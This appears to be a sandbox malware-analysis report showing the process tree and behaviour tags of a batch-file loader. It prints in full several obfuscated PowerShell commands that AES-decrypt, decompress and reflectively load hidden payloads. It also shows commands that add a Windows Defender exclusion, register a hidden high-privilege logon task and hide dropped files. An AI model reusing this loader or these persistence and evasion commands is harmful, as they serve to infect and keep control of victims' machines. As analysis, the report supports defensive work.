      Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Local\Temp\invoicer.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      - Command and Scripting Interpreter: PowerShell
      - Modifies registry class
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2652
      [depth 4] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_85_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_85.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        - Command and Scripting Interpreter: PowerShell
        - Suspicious behavior: EnumeratesProcesses
        - Suspicious use of AdjustPrivilegeToken
        PID: 5088
      [depth 4] C:\Windows\System32\WScript.exe
        Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_85.vbs"
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        PID: 800
        [depth 5] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_85.bat" "
          - Suspicious use of WriteProcessMemory
          PID: 976
          [depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('X7Zhl6Khi2ZbZn4/PrAf+8sGbyoXniPMQQRnCuRZwU4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FTiKRMGfSm1nLSyYBeX8aQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $VWgzw=New-Object System.IO.MemoryStream(,$param_var); $qruKH=New-Object System.IO.MemoryStream; $RPpcy=New-Object System.IO.Compression.GZipStream($VWgzw, [IO.Compression.CompressionMode]::Decompress); $RPpcy.CopyTo($qruKH); $RPpcy.Dispose(); $VWgzw.Dispose(); $qruKH.Dispose(); $qruKH.ToArray();}function execute_function($param_var,$param2_var){ $kflaA=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $sDziU=$kflaA.EntryPoint; $sDziU.Invoke($null, $param2_var);}$gEOgE = 'C:\Users\Admin\AppData\Roaming\startup_str_85.bat';$host.UI.RawUI.WindowTitle = $gEOgE;$nkdNJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gEOgE).Split([Environment]::NewLine);foreach ($inqUq in $nkdNJ) { if ($inqUq.StartsWith(':: ')) { $KTGgd=$inqUq.Substring(3); break; }}$payloads_var=[string[]]$KTGgd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            - Blocklisted process makes network request
            - Command and Scripting Interpreter: PowerShell
            - Drops startup file
            - Suspicious behavior: AddClipboardFormatListener
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of SetWindowsHookEx
            PID: 2956
  [depth 2] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat'
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID: 2564
  [depth 2] C:\Windows\system32\cmd.exe
    Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat" "
    - Suspicious use of WriteProcessMemory
    PID: 4552
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 3)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Local\Temp\Sysinfo.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3976
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 4)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_531_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_531.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2476
Process: C:\Windows\System32\WScript.exe (depth 4)
Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_531.vbs"
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID: 3028
Process: C:\Windows\system32\cmd.exe (depth 5)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_531.bat" "
- Suspicious use of WriteProcessMemory
PID: 4864
Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 6)
Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PMom9RnlfWzjG8MC5lXaac8aBGu+w5gW8NmRz9Kk+g='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Q3K43OSBcYlntcFGSbtNow=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $YujPS=New-Object System.IO.MemoryStream(,$param_var); $WQOly=New-Object System.IO.MemoryStream; $xgIaW=New-Object System.IO.Compression.GZipStream($YujPS, [IO.Compression.CompressionMode]::Decompress); $xgIaW.CopyTo($WQOly); $xgIaW.Dispose(); $YujPS.Dispose(); $WQOly.Dispose(); $WQOly.ToArray();}function execute_function($param_var,$param2_var){ $zVSXB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $RyFSy=$zVSXB.EntryPoint; $RyFSy.Invoke($null, $param2_var);}$tIIDK = 'C:\Users\Admin\AppData\Roaming\startup_str_531.bat';$host.UI.RawUI.WindowTitle = $tIIDK;$KlFzN=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($tIIDK).Split([Environment]::NewLine);foreach ($XYyBu in $KlFzN) { if ($XYyBu.StartsWith(':: ')) { $JQyvV=$XYyBu.Substring(3); break; }}$payloads_var=[string[]]$JQyvV.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID: 3548
Process: C:\Windows\System32\attrib.exe (depth 7)
Command line: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system"
- Sets file to hidden
- Views/modifies file attributes
PID: 4084
Process: C:\Windows\System32\attrib.exe (depth 7)
Command line: "C:\Windows\System32\attrib.exe" +s +h "C:\Users\Admin\system\system.exe"
- Sets file to hidden
- Views/modifies file attributes
PID: 4992
Process: C:\Windows\system32\cmd.exe (depth 7)
Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpFA1F.tmp.bat""
PID: 4764
Process: C:\Windows\system32\timeout.exe (depth 8)
Command line: timeout 3
- Delays execution with timeout.exe
PID: 4752
Process: C:\Users\Admin\system\system.exe (depth 8)
Command line: "C:\Users\Admin\system\system.exe"
- Executes dropped EXE
PID: 1548
Network
MITRE ATT&CK Enterprise v15
Downloads